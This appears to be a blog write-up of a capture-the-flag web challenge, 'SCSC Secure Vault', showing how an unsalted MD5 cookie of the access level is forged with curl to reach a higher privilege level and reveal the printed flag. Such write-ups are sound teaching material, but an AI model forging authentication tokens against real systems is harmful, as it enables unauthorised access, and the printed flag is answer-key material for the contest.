131 words
1 minutes
SCSC2026 Quals - SCSC Secure Vault - Web Exploitation Writeup
Event Archive

SCSC2026 Quals

Posts, writeups, and notes grouped under this event.

Archive/29 posts
Events/SCSC2026 Quals
2026-02-17
Writeup
CTF
/
Security
/
Web Exploitation

Category: Web Exploitation
URL: http://sriwijayasecuritysociety.com:8003/
Flag: SCSC26{kUE_r4h4s14_bU4t_4ks3s_L3v3L_d3w4}

Challenge Description#

A document storage system using hash-based authentication. Users are given a scsc_auth cookie that determines their access level. Default access is “level_1”, but the secret document requires “level_99”.

Initial Reconnaissance#

$ curl -v http://sriwijayasecuritysociety.com:8003/ 2>&1 | grep -i cookie
< Set-Cookie: scsc_auth=c98a679441798bdb9c194f9ca471e6cd

The cookie looks like an MD5 hash (32 hex characters).

Analysis#

Let’s verify if it’s MD5 of the access level:

$ echo -n "level_1" | md5sum
c98a679441798bdb9c194f9ca471e6cd  -

Confirmed! The cookie is simply MD5("level_1").

Vulnerability#

The authentication mechanism has critical flaws:

  1. No server-side session management
  2. No secret key or salt in the hash
  3. No signature verification (HMAC)
  4. The “secret” is just an unsalted MD5 hash that anyone can compute

Exploitation#

Generate the MD5 hash for level_99:

$ echo -n "level_99" | md5sum
9a22a3d174f06065a7dc2769f16fc738  -

Access the vault with forged token:

$ curl -s -b "scsc_auth=9a22a3d174f06065a7dc2769f16fc738" \
    http://sriwijayasecuritysociety.com:8003/index.php

Response#

<div class="file-item">
    <span>Top_Secret_Flag.txt</span>
    <span class="unlocked">SCSC26{kUE_r4h4s14_bU4t_4ks3s_L3v3L_d3w4}</span>
</div>
SCSC2026 Quals - SCSC Secure Vault - Web Exploitation Writeup
https://blog.rei.my.id/posts/20/scsc2026-quals-scsc-secure-vault-web-exploitation-writeup/
Author
Reidho Satria
Published at
2026-02-17
License
CC BY-NC-SA 4.0
© 2026 Reidho Satria. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari